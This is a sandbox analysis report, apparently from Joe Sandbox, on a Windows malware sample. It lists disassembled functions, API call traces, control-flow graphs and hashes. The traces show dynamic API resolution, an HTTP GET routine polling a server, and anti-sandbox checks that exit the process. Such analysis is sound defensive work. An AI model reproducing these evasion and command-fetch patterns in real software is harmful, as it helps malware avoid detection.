                              • GetProcAddress.KERNEL32(75FD0000,01978930), ref: 00DFA10A
                              • GetProcAddress.KERNEL32(75FD0000,0197CC38), ref: 00DFA123
                              • GetProcAddress.KERNEL32(75FD0000,019656E8), ref: 00DFA13B
                              • GetProcAddress.KERNEL32(73430000,0196AE20), ref: 00DFA160
                              • GetProcAddress.KERNEL32(73430000,01965888), ref: 00DFA179
                              • GetProcAddress.KERNEL32(73430000,0196AFD8), ref: 00DFA191
                              • GetProcAddress.KERNEL32(73430000,0197CB90), ref: 00DFA1A9
                              • GetProcAddress.KERNEL32(73430000,0197CAE8), ref: 00DFA1C2
                              • GetProcAddress.KERNEL32(73430000,019657E8), ref: 00DFA1DA
                              • GetProcAddress.KERNEL32(73430000,019658A8), ref: 00DFA1F2
                              • GetProcAddress.KERNEL32(73430000,0197CB48), ref: 00DFA20B
                              • GetProcAddress.KERNEL32(763B0000,01965AA8), ref: 00DFA22C
                              • GetProcAddress.KERNEL32(763B0000,019657C8), ref: 00DFA244
                              • GetProcAddress.KERNEL32(763B0000,0197C9F8), ref: 00DFA25D
                              • GetProcAddress.KERNEL32(763B0000,0197CB30), ref: 00DFA275
                              • GetProcAddress.KERNEL32(763B0000,01965A28), ref: 00DFA28D
                              • GetProcAddress.KERNEL32(750F0000,0196B1E0), ref: 00DFA2B3
                              • GetProcAddress.KERNEL32(750F0000,0196AFB0), ref: 00DFA2CB
                              • GetProcAddress.KERNEL32(750F0000,0197CAA0), ref: 00DFA2E3
                              • GetProcAddress.KERNEL32(750F0000,01965908), ref: 00DFA2FC
                              • GetProcAddress.KERNEL32(750F0000,01965808), ref: 00DFA314
                              • GetProcAddress.KERNEL32(750F0000,0196AE48), ref: 00DFA32C
                              • GetProcAddress.KERNEL32(75A50000,0197CBC0), ref: 00DFA352
                              • GetProcAddress.KERNEL32(75A50000,01965928), ref: 00DFA36A
                              • GetProcAddress.KERNEL32(75A50000,01978960), ref: 00DFA382
                              • GetProcAddress.KERNEL32(75A50000,0197CBF0), ref: 00DFA39B
                              • GetProcAddress.KERNEL32(75A50000,0197CC08), ref: 00DFA3B3
                              • GetProcAddress.KERNEL32(75A50000,01965A48), ref: 00DFA3CB
                              • GetProcAddress.KERNEL32(75A50000,01965A68), ref: 00DFA3E4
                              • GetProcAddress.KERNEL32(75A50000,0197CB60), ref: 00DFA3FC
                              • GetProcAddress.KERNEL32(75A50000,0197CC20), ref: 00DFA414
                              • GetProcAddress.KERNEL32(75070000,01965788), ref: 00DFA436
                              • GetProcAddress.KERNEL32(75070000,0197CB18), ref: 00DFA44E
                              • GetProcAddress.KERNEL32(75070000,0197CA40), ref: 00DFA466
                              • GetProcAddress.KERNEL32(75070000,0197CB78), ref: 00DFA47F
                              • GetProcAddress.KERNEL32(75070000,0197CA58), ref: 00DFA497
                              • GetProcAddress.KERNEL32(74E50000,01965A88), ref: 00DFA4B8
                              • GetProcAddress.KERNEL32(74E50000,019656C8), ref: 00DFA4D1
                              • GetProcAddress.KERNEL32(75320000,01965748), ref: 00DFA4F2
                              • GetProcAddress.KERNEL32(75320000,0197CA10), ref: 00DFA50A
                              • GetProcAddress.KERNEL32(6F060000,01965848), ref: 00DFA530
                              • GetProcAddress.KERNEL32(6F060000,01965708), ref: 00DFA548
                              • GetProcAddress.KERNEL32(6F060000,019658C8), ref: 00DFA560
                              • GetProcAddress.KERNEL32(6F060000,0197CA70), ref: 00DFA579
                              • GetProcAddress.KERNEL32(6F060000,019657A8), ref: 00DFA591
                              • GetProcAddress.KERNEL32(6F060000,01965988), ref: 00DFA5A9
                              • GetProcAddress.KERNEL32(6F060000,01965768), ref: 00DFA5C2
                              • GetProcAddress.KERNEL32(6F060000,01965828), ref: 00DFA5DA
                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00DFA5F1
                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00DFA607
                              • GetProcAddress.KERNEL32(74E00000,0197CC50), ref: 00DFA629
                              • GetProcAddress.KERNEL32(74E00000,019789B0), ref: 00DFA641
                              • GetProcAddress.KERNEL32(74E00000,0197C968), ref: 00DFA659
                              • GetProcAddress.KERNEL32(74E00000,0197CA28), ref: 00DFA672
                              • GetProcAddress.KERNEL32(74DF0000,019659A8), ref: 00DFA693
                              • GetProcAddress.KERNEL32(6FAA0000,0197C980), ref: 00DFA6B4
                              • GetProcAddress.KERNEL32(6FAA0000,01965868), ref: 00DFA6CD
                              • GetProcAddress.KERNEL32(6FAA0000,0197C9E0), ref: 00DFA6E5
                              • GetProcAddress.KERNEL32(6FAA0000,0197C998), ref: 00DFA6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 8e9e0743910a3d33717a23bdabf3c96daf14cdd263b32ed0241b2c60cccd9770
                              • Instruction ID: 1c1396881dc5a29f1796552c325ceb53f4bb05f02d59090231888332d3f92d02
                              • Opcode Fuzzy Hash: 8e9e0743910a3d33717a23bdabf3c96daf14cdd263b32ed0241b2c60cccd9770
                              • Instruction Fuzzy Hash: 4062EBB5700200EFC774DFA8EA8895637F9F78C601734856AE68AC3A4CDE7F94419B64
                              Function 00DE6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 de6280-de630b call dfa7a0 call de47b0 call dfa740 InternetOpenA StrCmpCA 1040 de630d 1033->1040 1041 de6314-de6318 1033->1041 1040->1041 1042 de631e-de6342 InternetConnectA 1041->1042 1043 de6509-de6525 call dfa7a0 call dfa800 * 2 1041->1043 1044 de64ff-de6503 InternetCloseHandle 1042->1044 1045 de6348-de634c 1042->1045 1063 de6528-de652d 1043->1063 1044->1043 1047 de634e-de6358 1045->1047 1048 de635a 1045->1048 1050 de6364-de6392 HttpOpenRequestA 1047->1050 1048->1050 1052 de6398-de639c 1050->1052 1053 de64f5-de64f9 InternetCloseHandle 1050->1053 1055 de639e-de63bf InternetSetOptionA 1052->1055 1056 de63c5-de6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1044 1055->1056 1058 de642c-de644b call df8940 1056->1058 1059 de6407-de6427 call dfa740 call dfa800 * 2 1056->1059 1066 de644d-de6454 1058->1066 1067 de64c9-de64e9 call dfa740 call dfa800 * 2 1058->1067 1059->1063 1069 de6456-de6480 InternetReadFile 1066->1069 1070 de64c7-de64ef InternetCloseHandle 1066->1070 1067->1063 1074 de648b 1069->1074 1075 de6482-de6489 1069->1075 1070->1053 1074->1070 1075->1074 1079 de648d-de64c5 call dfa9b0 call dfa8a0 call dfa800 1075->1079 1079->1069
                              APIs
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                                • Part of subcall function 00DE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • InternetOpenA.WININET(00E00DFE,00000001,00000000,00000000,00000000), ref: 00DE62E1
                              • StrCmpCA.SHLWAPI(?,0197F1D8), ref: 00DE6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,0197E7B8,00000000,00000000,00400100,00000000), ref: 00DE6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DE63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DE63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00DE63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00DE646D
                              • InternetCloseHandle.WININET(00000000), ref: 00DE64EF
                              • InternetCloseHandle.WININET(00000000), ref: 00DE64F9
                              • InternetCloseHandle.WININET(00000000), ref: 00DE6503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 5dbca39a9fa2713259220d54424f2716dda93f29b04b5490c9a32137f210105f
                              • Instruction ID: c4e25dc5e626ccaaeef8ee908d7d73391957562af22dd71b523369095b4d0dfc
                              • Opcode Fuzzy Hash: 5dbca39a9fa2713259220d54424f2716dda93f29b04b5490c9a32137f210105f
                              • Instruction Fuzzy Hash: D0715C71A00218EBDB24EFA4CC49BEE7774FB44700F108199F20A6B5C4DBB5AA85CF61
                              Function 00DF5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 df5510-df5577 call df5ad0 call dfa820 * 3 call dfa740 * 4 1106 df557c-df5583 1090->1106 1107 df55d7-df564c call dfa740 * 2 call de1590 call df52c0 call dfa8a0 call dfa800 call dfaad0 StrCmpCA 1106->1107 1108 df5585-df55b6 call dfa820 call dfa7a0 call de1590 call df51f0 1106->1108 1134 df5693-df56a9 call dfaad0 StrCmpCA 1107->1134 1138 df564e-df568e call dfa7a0 call de1590 call df51f0 call dfa8a0 call dfa800 1107->1138 1124 df55bb-df55d2 call dfa8a0 call dfa800 1108->1124 1124->1134 1139 df56af-df56b6 1134->1139 1140 df57dc-df5844 call dfa8a0 call dfa820 * 2 call de1670 call dfa800 * 4 call df6560 call de1550 1134->1140 1138->1134 1142 df56bc-df56c3 1139->1142 1143 df57da-df585f call dfaad0 StrCmpCA 1139->1143 1269 df5ac3-df5ac6 1140->1269 1146 df571e-df5793 call dfa740 * 2 call de1590 call df52c0 call dfa8a0 call dfa800 call dfaad0 StrCmpCA 1142->1146 1147 df56c5-df5719 call dfa820 call dfa7a0 call de1590 call df51f0 call dfa8a0 call dfa800 1142->1147 1162 df5865-df586c 1143->1162 1163 df5991-df59f9 call dfa8a0 call dfa820 * 2 call de1670 call dfa800 * 4 call df6560 call de1550 1143->1163 1146->1143 1246 df5795-df57d5 call dfa7a0 call de1590 call df51f0 call dfa8a0 call dfa800 1146->1246 1147->1143 1168 df598f-df5a14 call dfaad0 StrCmpCA 1162->1168 1169 df5872-df5879 1162->1169 1163->1269 1198 df5a28-df5a91 call dfa8a0 call dfa820 * 2 call de1670 call dfa800 * 4 call df6560 call de1550 1168->1198 1199 df5a16-df5a21 Sleep 1168->1199 1176 df587b-df58ce call dfa820 call dfa7a0 call de1590 call df51f0 call dfa8a0 call dfa800 1169->1176 1177 df58d3-df5948 call dfa740 * 2 call de1590 call df52c0 call dfa8a0 call dfa800 call dfaad0 StrCmpCA 1169->1177 1176->1168 1177->1168 1274 df594a-df598a call dfa7a0 call de1590 call df51f0 call dfa8a0 call dfa800 1177->1274 1198->1269 1199->1106 1246->1143 1274->1168
                              APIs
                                • Part of subcall function 00DFA820: lstrlen.KERNEL32(00DE4F05,?,?,00DE4F05,00E00DDE), ref: 00DFA82B
                                • Part of subcall function 00DFA820: lstrcpy.KERNEL32(00E00DDE,00000000), ref: 00DFA885
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF5857
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DF51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF5228
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DF52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF5318
                                • Part of subcall function 00DF52C0: lstrlen.KERNEL32(00000000), ref: 00DF532F
                                • Part of subcall function 00DF52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00DF5364
                                • Part of subcall function 00DF52C0: lstrlen.KERNEL32(00000000), ref: 00DF5383
                                • Part of subcall function 00DF52C0: lstrlen.KERNEL32(00000000), ref: 00DF53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00DF5A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: b712b122a781439edc6029e59d3e38e020eb6bc23938944723ff429ef7620f2c
                              • Instruction ID: 79af92956f0381449e2139ff272c78e3fc5ff461b28310a9926fea7baac6b2a0
                              • Opcode Fuzzy Hash: b712b122a781439edc6029e59d3e38e020eb6bc23938944723ff429ef7620f2c
                              • Instruction Fuzzy Hash: 73E152B1A1020C9ACB14FBA4E852EFD7378EF54340F51C118B64A67495EF75AB09CBB2
                              Function 00DF17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 df17a0-df17cd call dfaad0 StrCmpCA 1304 df17cf-df17d1 ExitProcess 1301->1304 1305 df17d7-df17f1 call dfaad0 1301->1305 1309 df17f4-df17f8 1305->1309 1310 df17fe-df1811 1309->1310 1311 df19c2-df19cd call dfa800 1309->1311 1313 df199e-df19bd 1310->1313 1314 df1817-df181a 1310->1314 1313->1309 1316 df187f-df1890 StrCmpCA 1314->1316 1317 df185d-df186e StrCmpCA 1314->1317 1318 df1835-df1844 call dfa820 1314->1318 1319 df1913-df1924 StrCmpCA 1314->1319 1320 df1932-df1943 StrCmpCA 1314->1320 1321 df18f1-df1902 StrCmpCA 1314->1321 1322 df1951-df1962 StrCmpCA 1314->1322 1323 df1970-df1981 StrCmpCA 1314->1323 1324 df18cf-df18e0 StrCmpCA 1314->1324 1325 df198f-df1999 call dfa820 1314->1325 1326 df18ad-df18be StrCmpCA 1314->1326 1327 df1849-df1858 call dfa820 1314->1327 1328 df1821-df1830 call dfa820 1314->1328 1344 df189e-df18a1 1316->1344 1345 df1892-df189c 1316->1345 1342 df187a 1317->1342 1343 df1870-df1873 1317->1343 1318->1313 1329 df1926-df1929 1319->1329 1330 df1930 1319->1330 1331 df194f 1320->1331 1332 df1945-df1948 1320->1332 1350 df190e 1321->1350 1351 df1904-df1907 1321->1351 1333 df196e 1322->1333 1334 df1964-df1967 1322->1334 1336 df198d 1323->1336 1337 df1983-df1986 1323->1337 1348 df18ec 1324->1348 1349 df18e2-df18e5 1324->1349 1325->1313 1346 df18ca 1326->1346 1347 df18c0-df18c3 1326->1347 1327->1313 1328->1313 1329->1330 1330->1313 1331->1313 1332->1331 1333->1313 1334->1333 1336->1313 1337->1336 1342->1313 1343->1342 1355 df18a8 1344->1355 1345->1355 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 00DF17C5
                              • ExitProcess.KERNEL32 ref: 00DF17D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 1f3ae50dd402ea53d8de7ad95aa4cbb9135a3c797a8d13a577d4e856b4bee3cb
                              • Instruction ID: 7f3a76cbdcbfbd7ee6994f8fae8b7fef20b6b699fc5b7e032d56ca3bc2000275
                              • Opcode Fuzzy Hash: 1f3ae50dd402ea53d8de7ad95aa4cbb9135a3c797a8d13a577d4e856b4bee3cb
                              • Instruction Fuzzy Hash: 1A5169B8A0020EEFCB14DFA0D994BBE77B5BF44304F118048E656A7280DBB5E941DBB1
                              Function 00DF7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 df7500-df754a GetWindowsDirectoryA 1357 df754c 1356->1357 1358 df7553-df75c7 GetVolumeInformationA call df8d00 * 3 1356->1358 1357->1358 1365 df75d8-df75df 1358->1365 1366 df75fc-df7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 df75e1-df75fa call df8d00 1365->1367 1369 df7619-df7626 call dfa740 1366->1369 1370 df7628-df7658 wsprintfA call dfa740 1366->1370 1367->1365 1377 df767e-df768e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00DF7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DF757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF760A
                              • wsprintfA.USER32 ref: 00DF7640
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\$
                              • API String ID: 1544550907-3109660283
                              • Opcode ID: 7d4365eeb78933c8df5f8a52d880a949324614c7aa3465016a80854f3f623f26
                              • Instruction ID: cdabdd32e80fdc169ca3c38babd1a08124cef8cf971b5f57c8e4d8ff896cfc50
                              • Opcode Fuzzy Hash: 7d4365eeb78933c8df5f8a52d880a949324614c7aa3465016a80854f3f623f26
                              • Instruction Fuzzy Hash: 3A4161B1904248EBDB20DF94DC45BEEB7B4EF08704F144199F609A7284DB79AA44CBB5
                              Function 00DF69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,019706C0), ref: 00DF98A1
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,019704F8), ref: 00DF98BA
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01970420), ref: 00DF98D2
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,019705D0), ref: 00DF98EA
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,019705E8), ref: 00DF9903
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01978970), ref: 00DF991B
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01965C48), ref: 00DF9933
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01965C68), ref: 00DF994C
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01970438), ref: 00DF9964
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01970450), ref: 00DF997C
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01970498), ref: 00DF9995
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,019704B0), ref: 00DF99AD
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01965B28), ref: 00DF99C5
                                • Part of subcall function 00DF9860: GetProcAddress.KERNEL32(75900000,01970510), ref: 00DF99DE
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DE11D0: ExitProcess.KERNEL32 ref: 00DE1211
                                • Part of subcall function 00DE1160: GetSystemInfo.KERNEL32(?), ref: 00DE116A
                                • Part of subcall function 00DE1160: ExitProcess.KERNEL32 ref: 00DE117E
                                • Part of subcall function 00DE1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00DE112B
                                • Part of subcall function 00DE1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00DE1132
                                • Part of subcall function 00DE1110: ExitProcess.KERNEL32 ref: 00DE1143
                                • Part of subcall function 00DE1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00DE123E
                                • Part of subcall function 00DE1220: ExitProcess.KERNEL32 ref: 00DE1294
                                • Part of subcall function 00DF6770: GetUserDefaultLangID.KERNEL32 ref: 00DF6774
                                • Part of subcall function 00DE1190: ExitProcess.KERNEL32 ref: 00DE11C6
                                • Part of subcall function 00DF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DE11B7), ref: 00DF7880
                                • Part of subcall function 00DF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00DF7887
